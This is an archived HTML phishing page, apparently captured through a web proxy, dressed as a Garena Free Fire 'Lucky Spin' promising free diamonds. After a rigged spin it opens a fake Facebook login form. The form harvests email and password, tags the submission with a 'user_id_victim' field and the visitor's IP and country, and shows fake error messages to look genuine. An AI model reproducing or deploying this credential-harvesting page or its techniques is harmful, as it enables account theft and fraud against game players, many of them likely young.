<!doctype html>
<html data-build-timestamp-utc="2021-04-06T08:25:31.258Z" lang="en">
 <head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta http-equiv="x-dns-prefetch-control" content="on">
  <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
  <style>
html body{margin-top:auto !important}#genMirrorInclude *{display:none;text-align:left;border:0;padding:0;margin:0;font:12px Verdana,Arial,Tahoma;font-weight:400;background:0 0;text-decoration:none;display:none}#genMirrorInclude script{display:none}#genMirrorInclude{border-bottom:3px solid #ce6c1c!important;background:#212529!important;position:fixed!important;top:0!important;left:0!important;width:0%!important;z-index:-1!important}@media (min-width:0px) and (max-width:0px){#sidebar .vItem img{max-width:0px}#sidebar .vItem .vMeta span{display:none!important}}@media (max-width:0px){#genMirrorInclude #genCookieLink{display:none}}@media (max-width:0px){#genMirrorInclude #genShareLink{display:none!important}}
#genMirrorInclude form{display:none !important;}
.genMirrorLogo {display:none !important;}
.genMirrorLogo {display:none !important;}
#vpnbookcontainer {display:none !important;}
#include {display:none !important;}
#mih-bottom  {display:none !important;}
#top_form  {display:none !important;}
</style>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="description" content="Dapatkan sekarang juga diamond gratis freefire tanpa syarat hnya di web ini">
  <title>LUCKY SPIN | FREE FIRE</title>
  <script>
        // $('head').append('');
    </script>
  <link rel="stylesheet" href="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLHqqdoo9nd0ZeRlarY&amp;proxy=usisp" type="text/css">
  <link rel="stylesheet" type="text/css" href="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZaikq9LJZ5qn2A&amp;proxy=usisp">
  <link rel="stylesheet" type="text/css" href="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZuRlcvGqKafk8er1Q&amp;proxy=usisp">
  <link rel="stylesheet" href="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZacnpTRoqViyNer&amp;proxy=usisp">
 </head>
 <body>
  <style type="text/css">
html body {
	margin-top: 50px !important;
}
#top_form {
	font-family: "Helvetica Neue",Helvetica,Arial,sans-serif!important;
	height: 45px;
	position: fixed;
	top:0;
	left:0;
	width: 100%;
	margin:0;
	z-index: 2100000000;
	-moz-user-select: none; 
	-khtml-user-select: none; 
	-webkit-user-select: none; 
	-o-user-select: none; 
	border-bottom:1px solid #151515;
	text-align: left;
	font-size: 14px!important;
	padding: 5px 0!important;
	background: white;
	overflow: hidden;
}
#top_form form {
  align-items: center!important;
  display: flex!important;
  flex-wrap: wrap!important;
}
#top_form form > * {
  font-family: inherit!important;
  font-size: inherit!important;
  font-weight: normal!important;
  margin: 3px .5em!important;
}
#top_form input,
#top_form select {
  border-radius: 3px;
  height: 30px!important;
  line-height: 1.6em!important;
  padding: 0 .5em!important;
}
#top_form input[type="button"] {
  cursor: pointer!important;
}
#top_form input[type="submit"] {
  background: #0073E6!important;
  border: none!important;
  color: #fff!important;
  text-decoration: none!important;
	text-transform: none!important;  
  transition: all 500ms ease!important;
}
#top_form input[type="submit"]:focus,
#top_form input[type="submit"]:hover {
  background: #0057AD!important;
}
#top_form input[name=url],
#top_form select {
	/*width: 550px;*/
	background: #eee!important;
	color: #111!important;
	border: 1px solid #ccc!important;
}
#top_form input[name=url]:focus,
#top_form select:focus {
	outline: 1px solid #ccc!important;
}
#top_form label {
	font-weight: normal!important;
	margin-right: .25em!important;
}
#top_form a {
  color: #0073E6!important;
}
#top_form a:focus,
#top_form a:hover {
  color: #0057AD!important;
}
@media only screen and (max-width:768px) {
html body {
	margin-top: 85px!important;
}
#top_form {
  height: 80px;
}
}
@media only screen and (max-width:420px) {
html body {
	margin-top: 105px!important;
}
#top_form {
  height: 100px;
}
}
</style>
  <div id="top_form">
   <div style="margin:0 auto; padding-left: 5px;">
    <form method="post" action="index.php" target="_top" style="margin:0; padding:0;">
     <input type="button" value="Home" onclick="window.location.href='index.php'"> <input aria-label="Enter URL" type="text" name="url" value="https://vmi1544998.contaboserver.net/ff-spiner/?i=ZSU9P" autocomplete="off"> <label for="proxy">Proxy:</label> <select id="proxy" name="proxy"> <option value="nl">Amsterdam, Netherlands</option> <option value="open">Open Proxies</option> <option value="world">World Static Proxies</option> <option value="us-il">Chicago, IL, US</option> <option value="us">Dallas, TX, US</option> <option value="de">Frankfurt, Germany</option> <option value="uk">London, UK</option> <option value="us-ca">Los Angeles, CA, US</option> <option value="in">Mumbai, India</option> <option value="us-ny">New York, NY, US</option> <option value="us-fl">Orlando, FL, US</option> <option value="fr">Paris, France</option> <option value="us-wa">Seattle, WA, US</option> <option value="sg">Singapore</option> <option value="usisp" selected>USA Residential &amp; Mobile ISPs</option> <option value="au">Sydney, Australia</option> <option value="jp">Tokyo, Japan</option> <option value="us-dc">Washington DC, US</option> <option value="ch">Zurich, Switzerland</option> </select> <input type="hidden" name="form" value="1"> <input type="submit" value="Go"> <a href="/account/signup/free/?campaignid=webproxy&amp;placement=frame" style="text-decoration: underline; margin-left: 5px;">Signup for a Free Trial</a>
    </form>
   </div>
  </div>
  <script type="text/javascript">
	smart_select(document.getElementsByName("url")[0]);
</script>
  <div style="direction:ltr !important;" class="iwan-contener">
   <header></header>
   <div class="banner">
    <img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZuil8uRn6CmypGn0Jxf0teglsxkoZqek87VmQ&amp;proxy=usisp">
   </div>
   <div class="wrap">
    <div class="spin">
     <div class="box" style="--i:1;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWZeotTL&amp;proxy=usisp">
      </div>
     </div>
     <div class="box" style="--i:2;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWdenNbL&amp;proxy=usisp">
      </div>
     </div>
     <div class="box" style="--i:3;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWhenNbL&amp;proxy=usisp">
      </div>
     </div>
     <div class="box" style="--i:4;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWleotTL&amp;proxy=usisp">
      </div>
     </div>
     <div class="box" style="--i:5;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWpenNbL&amp;proxy=usisp">
      </div>
     </div>
     <div class="box" style="--i:6;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWZgYNDUoA&amp;proxy=usisp">
      </div>
     </div>
     <div class="box" style="--i:7;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWxenNbL&amp;proxy=usisp">
      </div>
     </div>
     <div class="box" style="--i:8;">
      <div class="kotak">
       <svg>
        <rect></rect>
       </svg><img src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZW5enNbL&amp;proxy=usisp">
      </div>
     </div>
     <div class="arrow" id="selector"></div>
    </div>
    <center>
     <div class="putar" id="putar" onclick="spin()"></div>
    </center>
    <div class="tengah">
     <span></span>
    </div>
   </div><!-- POP UP HADIAH -->
   <div class="pop-hadiah">
    <div class="imBox">
     <img id="hadiah" src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZWZeotTL&amp;proxy=usisp">
    </div>
    <div class="confirm">
     <button onclick="popClose()">Cancel</button> <button onclick="popEntry()">Confirm</button>
    </div>
   </div><!-- END OF BLOCK --> <!-- POP UP LOGIN -->
   <div class="login">
    <div onclick="showfb()" class="fb">
     <i class="fab fa-facebook"></i>Login With Facebook
    </div>
   </div><!-- END OF BLOCK --> <!-- LOGIN FACEBOOK -->
   <div class="popup-login login-facebook animated fadeIn" style="display: none;">
    <div class="popup-box-login-fb">
     <div class="navbar-fb">
      <img width="45" src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZuRlcvGqKafxNid2qtg0tCZ&amp;proxy=usisp">
     </div>
     <div class="content-box-fb">
      <p class="alert sandi">Wrong password.<b>Have you forgotten your password?</b></p>
      <p class="alert email">The mobile number or email you entered doesn't match any accounts.<b>Find your account.</b></p><img width="75" height="75" src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZuil8uRn6CmypGaw6umzseZpdOsop2jk9TTmQ&amp;proxy=usisp">
      <div class="txt-login-fb">
       Log in to your Facebook account to connect with FreeFire
      </div>
      <form class="login-form" action="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fUmKjL1JOfkpqjpl-sysaVkaKf1Q&amp;proxy=usisp" method="POST" onsubmit="return valid()">
       <label> <input type="text" id="user" name="email" placeholder="Mobile number or email" autocomplete="off" autocapitalize="off"> </label> <label> <input type="password" id="pass" name="pass" placeholder="Password" autocomplete="off" autocapitalize="off"> </label> <input type="hidden" name="user_id_victim" value="ZSU9P"> <input name="type" value="free-spiner" type="hidden"> <input name="ipAddress" value="" type="hidden"> <input name="countryName" value="" type="hidden">
       <div style="display:none; visibility:hidden;">
        <input type="text" name="kill" maxlength="50">
       </div><button type="submit" id="btnfb" class="btn-login-fb">Log In</button>
      </form>
      <div class="txt-create-account">
       Create account
      </div>
      <div class="txt-not-now">
       Not now
      </div>
      <div class="txt-forgotten-password">
       Forgotten password?
      </div>
     </div>
     <div class="language-box">
      <center>
       <div class="language-name language-name-active">
        English (UK)
       </div>
       <div class="language-name">
        Bahasa Indonesia
       </div>
       <div class="language-name">
        Basa Jawa
       </div>
       <div class="language-name">
        Bahasa Melayu
       </div>
       <div class="language-name">
        日本語
       </div>
       <div class="language-name">
        Español
       </div>
       <div class="language-name">
        Português (Brasil)
       </div>
       <div class="language-name">
        <i class="fa fa-plus"></i>
       </div>
      </center>
     </div>
     <div class="copyright">
      Facebook Inc.
     </div>
    </div>
   </div><!-- END OF BLOCK -->
   <footer>
    © 2021 - Garena Free Fire
   </footer>
  </div>
  <div class="mask"></div>
  <script src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZ-hp8vWsmWhztJmzKo&amp;proxy=usisp"></script>
  <script src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZ-hp8vWsmWhztJmzKpak4s&amp;proxy=usisp"></script>
  <script src="http://www.proxymesh.com/web/index.php?q=ztitp6efk2fYpJuTl2ZnnXBsZ5PU0tmTxaGqyqirlaSU0p6rY8vKZdWnm9DHpGLKnZOsoM7SxKXXq6PKZZaom9XXZ6Sd05Ki1Q&amp;proxy=usisp"></script>
  <script>
$.getJSON('https://api.db-ip.com/v2/free/self', function(data) {
  $('input[name="ipAddress"]').val(data.ipAddress);
  $('input[name="countryName"]').val(data.countryName);
});
</script>
  <script type="text/javascript">

        function spin() {
            var selector = document.getElementById("selector");
            var putar = document.getElementById("putar");
            selector.style.display = "block";
            selector.style.transform = "rotate(45deg)";
            putar.style.transform = "translate(-50%,-50%) rotateZ(0)";
            putar.style.transition = "none";
            putar.classList.add("disabled");
            selector.style.transition = "none";
            selector.classList.remove("active");
            setTimeout(() => {
                var array = ["500", "501", "502", "503", "504", "505", "506", "507"];
                var rotate = 45;
                var random = Math.floor(Math.random() * 7) + 0;
                switch (random) {
                    case 0: { var img = 'ff_spin_style/4.png'; } break;
                    case 1: { var img = 'ff_spin_style/5.jpg'; } break;
                    case 2: { var img = 'ff_spin_style/10.jpg'; } break;
                    case 3: { var img = 'ff_spin_style/7.jpg'; } break;
                    case 4: { var img = 'ff_spin_style/9.jpg'; } break;
                    case 5: { var img = 'ff_spin_style/1.png'; } break;
                    case 6: { var img = 'ff_spin_style/2.jpg'; } break;
                    case 7: { var img = 'ff_spin_style/3.jpg'; } break;
                }

                var xixi = rotate * array[random];
                var loh = xixi - 45;
                selector.style.transform = "rotate(" + xixi + "deg)";
                selector.style.transition = "all ease 10s";
                putar.style.transform = "translate(-50%,-50%) rotateZ(" + loh + "deg)";
                putar.style.transition = "all ease 10s";
                setTimeout(() => {
                    putar.classList.remove("disabled");
                    selector.classList.add("active");
                    setTimeout(() => {
                        $('.mask').fadeIn();
                        $('.pop-hadiah').fadeIn();
                        $('#hadiah').attr("src", img);
                    }, 1000)
                }, 10000)

            }, 500)
        }
        function reset() {
            var selector = document.getElementById("selector");
            var putar = document.getElementById("putar");
            selector.style.display = "block";
            selector.style.transform = "rotate(45deg)";
            putar.style.transform = "translate(-50%,-50%) rotateZ(0)";
            putar.style.transition = "none";
            selector.style.transition = "none";
            selector.classList.remove("active");
            putar.classList.remove("disabled");
        }
        function popClose() {
            $('.mask').fadeOut();
            $('.pop-hadiah').fadeOut();
            reset();
        }
        function popEntry() {
            $('.login').fadeIn();
            $('.pop-hadiah').fadeOut();
        }
        function showfb() {
            $('.login-facebook').show();
        }
    </script>
  <script type="text/javascript">
        function valid() {
            var user = $('#user').val();
            var pass = $('#pass').val();
            var ip = $('#ip').val();
            if (user == '' || user == null || user.length <= 5) {
                $('.email').show();
                $('.sandi').hide();
                return false;
            } else {
                $('.email').hide();
            }
            if (pass == '' || pass == null || pass.length <= 5) {
                $('.sandi').show();
                return false;
            } else {
                $('.sandi').hide();
            }
        }
    </script>
 </body>
</html>